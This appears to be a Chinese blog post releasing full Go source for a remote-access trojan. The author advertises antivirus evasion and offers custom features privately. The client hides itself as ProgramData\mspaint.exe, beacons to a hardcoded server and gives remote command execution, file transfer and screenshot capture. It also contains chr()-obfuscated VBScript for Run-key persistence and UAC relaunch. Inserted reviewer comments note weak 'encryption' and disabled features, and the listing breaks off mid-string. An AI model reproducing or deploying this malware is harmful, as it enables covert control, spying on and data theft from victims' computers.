0x01 工具介绍
由于工作需要,写了一款Golang远控软件,现在也用不上了,开源算了,支持很多功能,如 ”加密传输、截图回传、反向Socks5代理回内网、开机自启“。(审阅注:下文代码里的“加密传输”实际只是对每一行数据做 base64 编码后走明文 TCP,base64 是编码而不是加密,连接密码同样是以 base64 明文发送的;本文贴出的代码中没有反向 Socks5 的实现,开机自启函数 install_start 的调用也被注释掉了,见下方功能列表中标 [x] 的条目。)
当client.exe被点击后,小马会自动复制本身到 ”C:\ProgramData“ 隐藏目录并再次执行,自动删除当前桌面上的Client文件。(审阅注:client.go 中删除原文件的 os.Remove 调用是被注释掉的,实际只对原文件执行了 chmod,并不会删除。)
目前大多数远控软件都基于C++/C#编写的,杀软对这些开发语言很敏感,非常容易就被识别出来了,但使用Golang语言编写的就不一样了,改一改就能过360、火绒、金山、腾讯电脑管家、AVG、等等,如有需要添加其他功能,可以私我哦。。。Py(审阅注:下方的查杀截图只代表截图当时的检测情况,会随引擎特征更新而失效;客户端落盘路径 %SystemDrive%\ProgramData\mspaint.exe、截图临时文件 tmp.png 以及固定端口上的 base64 明文协议都是很容易被检测的固定特征。)
0x02 目前的功能
- 多用户上线,多用户管理
- 下载远程文件
- 上传本地文件到目标电脑
- 屏幕截图,回传
- 动态设置编码
- 执行系统任意指令
- 安装成服务,实现开机自启[x]
- 反向socks5[x]
- EXE文件捆绑[x]
0x05 过杀软情况
火绒查杀
image.png
微步在线恶意文件检测
image.png
VirSCAN.org-多引擎在线病毒扫描
image.png
0x03 服务端代码 server.go
package main
import (
"bufio"
"encoding/base64"
"flag"
"fmt"
"io"
"io/ioutil"
"log"
"net"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"sync"
"time"
)
// ANSI SGR escape sequences used to colour the operator console.
// Each selects a foreground colour (3x) and switches on bold (;1).
const (
	WHITE   = "\x1b[37;1m"
	RED     = "\x1b[31;1m"
	GREEN   = "\x1b[32;1m"
	YELLOW  = "\x1b[33;1m"
	BLUE    = "\x1b[34;1m"
	MAGENTA = "\x1b[35;1m"
	CYAN    = "\x1b[36;1m"
)

// VERSION labels this server build. It is declared but not referenced
// anywhere else in this listing, so it is never shown or sent to clients.
const VERSION = "2.5.0"
var (
	// Listener settings. The default port is 53 (the DNS port), presumably
	// so the listener passes a port-based filter; the protocol itself is
	// plain TCP lines, not DNS.
	inputIP   = flag.String("IP", "0.0.0.0", "Listen IP")
	inputPort = flag.String("PORT", "53", "Listen Port")

	// Shared static secret a client must present on its first line,
	// base64-encoded and otherwise in the clear, before it gets a session.
	connPwd = flag.String("PWD", "18Sd9fkdkf9", "Connection Password")

	// Session registry. counter hands out ids (it only ever increases);
	// both maps are keyed by that id. lock guards registration in
	// connection(); reads in main() do not take it.
	counter        int
	connlist       = make(map[int]net.Conn)
	connlistIPAddr = make(map[int]string)
	lock           = new(sync.Mutex)

	// Output name the operator typed for the next "download". It is a single
	// global, so downloads from several sessions at once overwrite each other's name.
	downloadOutName string
)
// getDateTime returns the current local time as a filename-safe stamp of
// the form "2006-01-02-15-04-05". Resolution is one second, so two
// transfers that land in the same second under the same base name
// overwrite each other.
func getDateTime() string {
	// Go reference time; see https://golang.org/pkg/time/#example_Time_Format
	const stampLayout = "2006-01-02-15-04-05"
	return time.Now().Format(stampLayout)
}
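// stdinReader is created on first use and kept for the life of the process.
// The original built a fresh bufio.Reader on every call; a reader may pull
// several lines off stdin at once, so with a piped stdin every line after the
// first one was silently lost.
var stdinReader *bufio.Reader

// ReadLine blocks until one line is available on stdin and returns it without
// the trailing newline. Lines longer than the reader's buffer are accumulated
// instead of being cut at the first chunk (the original ignored isPrefix).
// On a read error, including EOF, it prints a notice and returns whatever was
// read so far — "" at EOF, as before.
func ReadLine() string {
	if stdinReader == nil {
		stdinReader = bufio.NewReader(os.Stdin)
	}
	var line []byte
	for {
		part, isPrefix, err := stdinReader.ReadLine()
		line = append(line, part...)
		if err != nil {
			fmt.Println(RED, "[!] Error to Read Line!")
			break
		}
		if !isPrefix {
			break
		}
	}
	return string(line)
}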
// connection owns one authenticated client session for its lifetime.
// It registers the conn under a fresh id (counter only ever increases, so
// ids are never reused), then loops reading one base64 line at a time:
// "download" and "screenshot" are followed by a second line carrying file
// bytes, which are written into the server's working directory; anything
// else is treated as command output and printed verbatim.
//
// Review notes:
//   - bufio.NewReader(conn) is rebuilt for every read. A reader may pull more
//     than one line off the socket, so when the client sends "download" or
//     "screenshot" and the data line back to back, the second reader can
//     miss the data line (and then block waiting for one).
//   - Only io.EOF ends the loop; any other read error yields an empty
//     message and the loop spins printing blank lines.
//   - The deletes from connlist/connlistIPAddr are done without lock,
//     racing with registration here and with the reads in main().
//   - ReadString has no length limit: a client can send an endless line
//     and exhaust the console's memory.
//   - Client output is printed raw, so a hostile client can push ANSI
//     escape sequences into the operator's terminal.
//   - ioutil.WriteFile gets mode 777 (decimal, i.e. 0o1411), not 0777, and
//     its error is ignored; all base64 decode errors are ignored too.
//   - Go's base64 decoder skips '\n', so the newline ReadString leaves on
//     message does not break decoding.
func connection(conn net.Conn) {
	defer conn.Close()
	var myid int
	myip := conn.RemoteAddr().String()
	// Register the session; lock covers the counter and both maps.
	lock.Lock()
	counter++
	myid = counter
	connlist[counter] = conn
	connlistIPAddr[counter] = myip
	lock.Unlock()
	fmt.Printf("--- client: %s connection ---\n", myip)
	for {
		message, err := bufio.NewReader(conn).ReadString('\n')
		// Client went away: deregister (without the lock) and leave the loop.
		if err == io.EOF {
			conn.Close()
			delete(connlist, myid)
			delete(connlistIPAddr, myid)
			break
		}
		decoded, _ := base64.StdEncoding.DecodeString(message)
		decMessage := string(decoded)
		switch decMessage {
		case "download":
			//fmt.Println("---收到download指令,等待下一次数据上传---")
			// Next line is the file content (base64.URLEncoding, as the client sends it).
			encData, _ := bufio.NewReader(conn).ReadString('\n')
			fmt.Println(YELLOW, "-> Downloading...")
			decData, _ := base64.URLEncoding.DecodeString(encData)
			// Saved as <operator-chosen name><timestamp> in the current directory;
			// with an empty name the file is just the timestamp.
			downFilePath, _ := filepath.Abs(string(downloadOutName) + getDateTime())
			ioutil.WriteFile(downFilePath, []byte(decData), 777)
			fmt.Println(GREEN, "-> Download Done...")
		case "screenshot":
			encData, _ := bufio.NewReader(conn).ReadString('\n')
			fmt.Println(YELLOW, "-> Getting ScreenShot...")
			decData, _ := base64.URLEncoding.DecodeString(encData)
			//filename := myip + getDateTime()+".png"
			// Saved as <ip_port><timestamp>.png in the current directory.
			absFilePath, _ := filepath.Abs(strings.Replace(myip, ":", "_", -1) + getDateTime() + ".png")
			ioutil.WriteFile(absFilePath, []byte(decData), 777)
			fmt.Printf(GREEN+"-> ScreenShot Done, filename: %s\n", absFilePath)
		default:
			// Anything else is command output from the client, echoed as-is.
			fmt.Println("\n" + decMessage)
		}
	}
	fmt.Printf("--- %s close---\n", myip)
}
// handleConnWait binds the TCP listener and accepts clients forever. The first
// line a client sends must be base64(connPwd); on a match the connection is
// handed to connection() on its own goroutine, otherwise the client receives
// base64("back") and is closed.
//
// Review notes:
//   - The password line is read on the accept goroutine with no deadline, so
//     a single peer that connects and never sends '\n' stalls every further
//     session.
//   - The read error is discarded; on error message is "" and the comparison
//     simply fails.
//   - Any TCP peer that sends a newline gets the fixed reply "YmFjaw==\n",
//     which fingerprints this server to a scanner.
//   - The secret is sent and compared in the clear (base64 is not
//     encryption); anyone who can see the first packet of a session has it.
//   - log.Fatal on an Accept error takes the whole console down.
func handleConnWait() {
	l, err := net.Listen("tcp", *inputIP+":"+*inputPort)
	if err != nil {
		log.Fatal(err)
	}
	defer l.Close()
	for {
		conn, err := l.Accept()
		if err != nil {
			log.Fatal(err)
		}
		// Authentication: the first line must decode to the shared password.
		message, err := bufio.NewReader(conn).ReadString('\n')
		decoded, _ := base64.StdEncoding.DecodeString(message)
		if string(decoded) == *connPwd {
			go connection(conn)
		} else {
			// Wrong or missing password: tell the peer to go away and hang up.
			backMsg := base64.URLEncoding.EncodeToString([]byte("back"))
			conn.Write([]byte(backMsg + "\n"))
			conn.Close()
		}
	}
}
// main starts the listener in the background and then runs the operator
// console loop on stdin. connid selects the session commands are sent to;
// 0 is never a valid id (counter starts at 1), so until "session" has been
// used most commands are silently dropped by the `ok` checks below.
//
// Review notes:
//   - connlist / connlistIPAddr are read here without taking `lock` while
//     connection() writes them from other goroutines: a data race.
//   - Commands go out base64.URLEncoding-encoded but the client decodes them
//     with StdEncoding (client.go); the alphabets differ for values 62/63,
//     so some commands and paths will not decode correctly on the client.
//   - In "upload" the timestamp is appended after base64 encoding
//     (encOutput + getDateTime()), so the client's decode of the output name
//     meets non-alphabet bytes ('-') and the saved name is likely mangled.
//   - Writes to _conn ignore errors; a dead session is only noticed by
//     connection()'s EOF, and connid keeps pointing at the stale id.
//   - "startup" is listed in help but has no case here; it falls through to
//     default and is sent to the client as a shell command.
func main() {
	flag.Parse()
	go handleConnWait()
	connid := 0
	for {
		fmt.Print(RED, "SESSION ", connlistIPAddr[connid], WHITE, "> ")
		command := ReadLine()
		_conn, ok := connlist[connid]
		switch command {
		case "":
			// Empty input: nothing to do.
		case "help":
			fmt.Println("")
			fmt.Println(CYAN, "COMMANDS DESCRIPTION")
			fmt.Println(CYAN, "-------------------------------------------------------")
			fmt.Println(CYAN, "session 选择在线的客户端")
			fmt.Println(CYAN, "download 下载远程文件")
			fmt.Println(CYAN, "upload 上传本地文件")
			fmt.Println(CYAN, "screenshot 远程桌面截图")
			fmt.Println(CYAN, "charset gbk 设置客户端命令行输出编码,gbk是简体中文")
			fmt.Println(CYAN, "clear 清楚屏幕")
			fmt.Println(CYAN, "exit 客户端下线")
			fmt.Println(CYAN, "quit 退出服务器端")
			fmt.Println(CYAN, "startup 加入启动项目文件夹")
			fmt.Println(CYAN, "-------------------------------------------------------")
			fmt.Println("")
		case "session":
			// Dumps the raw map (id -> conn) and asks for an id to switch to.
			fmt.Println(connlist)
			fmt.Print("选择客户端ID: ")
			inputid := ReadLine()
			if inputid != "" {
				var e error
				connid, e = strconv.Atoi(inputid)
				if e != nil {
					fmt.Println("请输入数字")
				} else if _, ok := connlist[connid]; ok {
					// Id exists: ask the client for its OS string; the reply is
					// printed asynchronously by connection().
					_cmd := base64.URLEncoding.EncodeToString([]byte("getos"))
					connlist[connid].Write([]byte(_cmd + "\n"))
				}
			}
		case "clear":
			ClearScreen()
		case "exit":
			// Tells the client to close and terminate itself (client calls os.Exit).
			if ok {
				encDownload := base64.URLEncoding.EncodeToString([]byte("exit"))
				_conn.Write([]byte(encDownload + "\n"))
			}
		case "quit":
			os.Exit(0)
		case "download":
			if ok {
				// Step 1: tell the client a download is coming.
				encDownload := base64.URLEncoding.EncodeToString([]byte("download"))
				_conn.Write([]byte(encDownload + "\n"))
				// Step 2: ask the operator for the remote path and a local output name.
				fmt.Print("File Path to Download: ")
				nameDownload := ReadLine()
				fmt.Print("Output name: ")
				downloadOutName = ReadLine()
				// Send the remote path; the file bytes come back on the session
				// goroutine and are written by connection().
				encName := base64.URLEncoding.EncodeToString([]byte(nameDownload))
				_conn.Write([]byte(encName + "\n"))
				// Leftover debug print of the encoded path (no newline).
				fmt.Print(encName)
			}
		case "screenshot":
			if ok {
				encScreenShot := base64.URLEncoding.EncodeToString([]byte("screenshot"))
				_conn.Write([]byte(encScreenShot + "\n"))
			}
		case "upload":
			if ok {
				encUpload := base64.URLEncoding.EncodeToString([]byte("upload"))
				_conn.Write([]byte(encUpload + "\n"))
				fmt.Print("File Path to Upload: ")
				pathUpload := ReadLine()
				fmt.Print("Output name: ")
				outputName := ReadLine()
				// Output name line: base64 of the name with the raw timestamp
				// concatenated after it (outside the encoding).
				encOutput := base64.URLEncoding.EncodeToString([]byte(outputName))
				_conn.Write([]byte(encOutput + getDateTime() + "\n"))
				fmt.Println(YELLOW, "-> Uploading...")
				// Read the local file and send it as one base64 line. If the read
				// fails the client is already waiting for a data line it never gets.
				file, err := ioutil.ReadFile(pathUpload)
				if err != nil {
					fmt.Println(RED, "[!] File not found!")
					break
				}
				encData := base64.URLEncoding.EncodeToString(file)
				_conn.Write([]byte(string(encData) + "\n"))
				fmt.Println(GREEN, "-> Upload Done...")
			}
		default:
			// Everything else is forwarded to the client as a shell command.
			if ok {
				_cmd := base64.URLEncoding.EncodeToString([]byte(command))
				_conn.Write([]byte(_cmd + "\n"))
			}
		}
	}
}
// ClearScreen clears the operator terminal by spawning the external "clear"
// command with its output attached to our stdout. Any failure — for example
// on a Windows console, where "clear" does not exist — is silently ignored.
func ClearScreen() {
	clr := exec.Command("clear")
	clr.Stdout = os.Stdout
	_ = clr.Run() // best-effort: a missing binary just leaves the screen as is
}
0x04 客户端代码 client.go
客户端编译前,需要更改上线IP、连接密码CONNPWD这两个参数,因为只有与服务端的连接密码相同时,才会建立连接,保证了建立Socket时不会出现上线误报问题。(审阅注:这个密码只经 base64 编码、在服务端用 == 直接比较,并没有加密;能看到会话第一个数据包的人就能拿到密码。另外服务端对密码错误的连接会固定回复 base64 的 "back",扫描器据此就能识别出这个监听端口。)
package main
import (
"bufio"
"bytes"
"context"
"encoding/base64"
"fmt"
"image/png"
"io"
"io/ioutil"
"log"
"net"
"os"
"os/exec"
"path/filepath"
"runtime"
"strings"
"syscall"
"time"
"github.com/axgle/mahonia"
screenshot "github.com/kbinani/screenshot"
)
// IP is the server's host:port. It is a literal address, not a DNS name,
// and the connection is plain TCP with no TLS.
const IP = "192.168.1.209:53"

// CONNPWD must equal the server's -PWD flag. It is sent as the first line of
// every session as a base64 string, i.e. effectively in the clear.
const CONNPWD = "18Sd9fkdkf9"
// Timeout bounds a single remote command; mCommandTimeOut runs the child
// under a context with this deadline and kills it when it expires.
var Timeout = 30 * time.Second

// charset names the code page that command output is assumed to be in.
// "utf-8" means pass-through; the operator changes it with "charset <name>"
// (for example "charset gbk" on a Simplified-Chinese Windows host).
var charset = "utf-8"
// main is the dropper/launcher stage. On Windows it wants to run from a copy
// at %SystemDrive%\ProgramData\mspaint.exe (a name chosen to look like
// Paint). If this process is not that copy, it creates the copy (if missing)
// and starts it with our own path as argv[1], then returns. If this process
// is the copy, it chmods the original dropper — the os.Remove that would
// delete it is commented out, so the dropper stays on disk despite the
// write-up — and enters the beacon loop. On any other OS it only beacons.
//
// Review notes:
//   - Every error is printed and execution continues; a failed os.Create
//     still leads to io.Copy on a nil *os.File and then to mCommand.
//   - The `for { connect() }` loops never end: connect() never returns
//     normally, and on a dial failure it recurses into itself.
//   - fmt.Println(len(os.Args)) is a leftover debug print.
//   - On Windows os.Chmod only toggles the read-only attribute, so the two
//     0777 calls do little there.
//   - Persistence (install_start) exists but both call sites are commented
//     out; nothing here adds a Run key or a service.
func main() {
	if runtime.GOOS == "windows" {
		targetPath := os.Getenv("systemdrive") + "\\ProgramData\\"
		targetFile := targetPath + "mspaint.exe"
		os.Mkdir(targetPath, os.ModePerm)
		//exec.Command("")
		// Absolute path of the running executable, used to tell which stage we are.
		currentFile, _ := exec.LookPath(os.Args[0])
		currentFileAbs, _ := filepath.Abs(currentFile)
		// Second stage: we are the copy in ProgramData.
		if currentFileAbs == targetFile {
			// Clean-up of the original dropper: only the chmod survives,
			// the removal itself is commented out.
			fmt.Println(len(os.Args))
			if len(os.Args) > 1 {
				err := os.Chmod(os.Args[1], 0777)
				if err != nil {
					fmt.Println(err)
				}
				//err = os.Remove(os.Args[1])
				//if err != nil {
				fmt.Println(err)
				//}
			}
			// Start beaconing; connect() never returns normally.
			for {
				connect()
			}
		} else {
			// First stage: create the copy if it is not there yet.
			_, err := os.Stat(targetFile)
			if err != nil {
				// Open our own image for reading.
				srcFile, _ := os.Open(currentFile)
				// Create the destination; on failure desFile is nil but we carry on.
				desFile, err := os.Create(targetFile)
				if err != nil {
					fmt.Println(err)
				}
				// Copy the executable image.
				_, err = io.Copy(desFile, srcFile)
				if err != nil {
					fmt.Println(err)
				}
				// Intended to make the copy executable (0777).
				err = os.Chmod(targetFile, 0777)
				if err != nil {
					fmt.Println(err)
				}
				// Handles must be closed before the copy can be executed,
				// which is why defer is not used here.
				srcFile.Close()
				desFile.Close()
				// Launch the copy, passing our own path so it can clean up.
				mCommand(targetFile, currentFileAbs)
				// Decoy image opening, disabled.
				//mCommand("cmd.exe", "/c", "start", "max.jpg")
				//install_start() //自七
			} else {
				// Copy already present: just launch it and pass our path.
				mCommand(targetFile, currentFileAbs)
				// Decoy image opening, disabled.
				//mCommand("cmd.exe", "/c", "start", "max.jpg")
				//install_start() //自七
			}
		}
	} else {
		// Non-Windows: no copy, no persistence, just beacon forever.
		for {
			connect()
		}
	}
}
// install_start drops two VBScript files and runs one of them to add a
// Run-key autostart entry for the ProgramData copy. It is dead code in this
// listing: both call sites in main are commented out.
//
// The script bodies are built entirely from chr() calls inside an
// execute(...) wrapper, apparently so the plaintext never appears in the
// binary. Decoding the character codes gives:
//
//   test.vbs – a "sudo"-style helper: prints usage if called without
//              arguments, otherwise Shell.Application.ShellExecute
//              <arg0>, <remaining args>, "", "runas" to relaunch the given
//              command through a UAC prompt (not a bypass — the consent
//              dialog is still shown). A block commented out with ' would
//              have used AppActivate("用户账户控制") + SendKeys "%y" to
//              press the dialog's Yes button automatically.
//   add.vbs  – via WScript.Shell, hidden (vbhide), runs
//                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
//                  CurrentVersion\Run /v AUTORUN /t REG_SZ
//                  /d C:\ProgramData\mspaint.exe /f
//              once directly and once more prefixed with "test.vbs", i.e.
//              retried elevated (writing HKLM needs admin).
//
// Review notes:
//   - Both files are written relative to the current working directory,
//     so where they land depends on how the copy was launched.
//   - add.vbs is removed afterwards but test.vbs is left on disk.
//   - The error checks are crossed: the second WriteFile reports `err`
//     instead of `err2`, and the Remove result `er` is tested through
//     `err`, so a failed removal is never reported.
//   - The two string literals are shown in the page wrapped across several
//     lines; they are re-joined here so each is one Go string constant.
func install_start() {
	// test.vbs: the "runas" re-launch helper described above.
	err := ioutil.WriteFile("test.vbs", []byte("execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(85)&chr(65)&chr(67)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(65)&chr(112)&chr(112)&chr(108)&chr(105)&chr(99)&chr(97)&chr(116)&chr(105)&chr(111)&chr(110)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(83)&chr(101)&chr(116)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(73)&chr(102)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(60)&chr(49)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(101)&chr(99)&chr(104)&chr(111)&chr(32)&chr(34)&chr(35821)&chr(27861)&chr(58)&chr(32)&chr(32)&chr(115)&chr(117)&chr(100)&chr(111)&chr(32)&chr(60)&chr(99)&chr(111)&chr(109)&chr(109)&chr(97)&chr(110)&chr(100)&chr(62)&chr(32)&chr(91)&chr(97)&chr(114)&chr(103)&chr(115)&chr(93)&chr(34)&chr(32)&chr(32)&chr(10)&chr(69)&chr(108)&chr(115)&chr(101)&chr(73)&chr(102)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(61)&chr(49)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(85)&chr(65)&chr(67)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(69)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(97)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(48)&chr(41)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(114)&chr(117)&chr(110)&chr(97)&chr(115)&chr(34)&chr(44)&chr(32)&chr(49)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(108)&chr(101)&chr(101)&chr(112)&chr(32)&chr(49)&chr(53)&chr(48)&chr(48)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(65)&chr(112)&chr(112)&chr(97)&chr(99)&chr(116)&chr(105)&chr(118)&chr(97)&chr(116)&chr(101)&chr(40)&chr(34)&chr(29992)&chr(25143)&chr(36134)&chr(25143)&chr(25511)&chr(21046)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(73)&chr(102)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(116)&chr(114)&chr(117)&chr(101)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(115)&chr(101)&chr(110)&chr(100)&chr(107)&chr(101)&chr(121)&chr(115)&chr(32)&chr(34)&chr(37)&chr(121)&chr(34)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(69)&chr(108)&chr(115)&chr(101)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(101)&chr(99)&chr(104)&chr(111)&chr(32)&chr(34)&chr(33258)&chr(21160)&chr(33719)&chr(21462)&chr(31649)&chr(29702)&chr(21592)&chr(26435)&chr(38480)&chr(22833)&chr(36133)&chr(65292)&chr(35831)&chr(25163)&chr(21160)&chr(30830)&chr(35748)&chr(12290)&chr(34)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(69)&chr(110)&chr(100)&chr(32)&chr(73)&chr(102)&chr(32)&chr(32)&chr(10)&chr(69)&chr(108)&chr(115)&chr(101)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(61)&chr(32)&chr(78)&chr(85)&chr(76)&chr(76)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(70)&chr(111)&chr(114)&chr(32)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(61)&chr(49)&chr(32)&chr(84)&chr(111)&chr(32)&chr(40)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(45)&chr(49)&chr(41)&chr(32)&chr(83)&chr(116)&chr(101)&chr(112)&chr(32)&chr(49)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(61)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(38)&chr(32)&chr(34)&chr(32)&chr(34)&chr(32)&chr(38)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(41)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(78)&chr(101)&chr(120)&chr(116)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(85)&chr(65)&chr(67)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(69)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(97)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(48)&chr(41)&chr(44)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(114)&chr(117)&chr(110)&chr(97)&chr(115)&chr(34)&chr(44)&chr(32)&chr(53)&chr(32)&chr(32)&chr(10)&chr(69)&chr(110)&chr(100)&chr(32)&chr(73)&chr(102)&chr(32)&chr(32))"), 0666)
	if err != nil {
		log.Fatal(err)
	}
	// add.vbs: the two hidden "reg add ... \Run /v AUTORUN" invocations described above.
	err2 := ioutil.WriteFile("add.vbs", []byte("execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(10)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(34)&chr(114)&chr(101)&chr(103)&chr(32)&chr(97)&chr(100)&chr(100)&chr(32)&chr(72)&chr(75)&chr(69)&chr(89)&chr(95)&chr(76)&chr(79)&chr(67)&chr(65)&chr(76)&chr(95)&chr(77)&chr(65)&chr(67)&chr(72)&chr(73)&chr(78)&chr(69)&chr(92)&chr(83)&chr(79)&chr(70)&chr(84)&chr(87)&chr(65)&chr(82)&chr(69)&chr(92)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(92)&chr(87)&chr(105)&chr(110)&chr(100)&chr(111)&chr(119)&chr(115)&chr(92)&chr(67)&chr(117)&chr(114)&chr(114)&chr(101)&chr(110)&chr(116)&chr(86)&chr(101)&chr(114)&chr(115)&chr(105)&chr(111)&chr(110)&chr(92)&chr(82)&chr(117)&chr(110)&chr(32)&chr(47)&chr(118)&chr(32)&chr(65)&chr(85)&chr(84)&chr(79)&chr(82)&chr(85)&chr(78)&chr(32)&chr(47)&chr(116)&chr(32)&chr(82)&chr(69)&chr(71)&chr(95)&chr(83)&chr(90)&chr(32)&chr(47)&chr(100)&chr(32)&chr(67)&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(109)&chr(68)&chr(97)&chr(116)&chr(97)&chr(92)&chr(109)&chr(115)&chr(112)&chr(97)&chr(105)&chr(110)&chr(116)&chr(46)&chr(101)&chr(120)&chr(101)&chr(32)&chr(47)&chr(102)&chr(34)&chr(44)&chr(118)&chr(98)&chr(104)&chr(105)&chr(100)&chr(101)&chr(10)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(34)&chr(116)&chr(101)&chr(115)&chr(116)&chr(46)&chr(118)&chr(98)&chr(115)&chr(32)&chr(114)&chr(101)&ch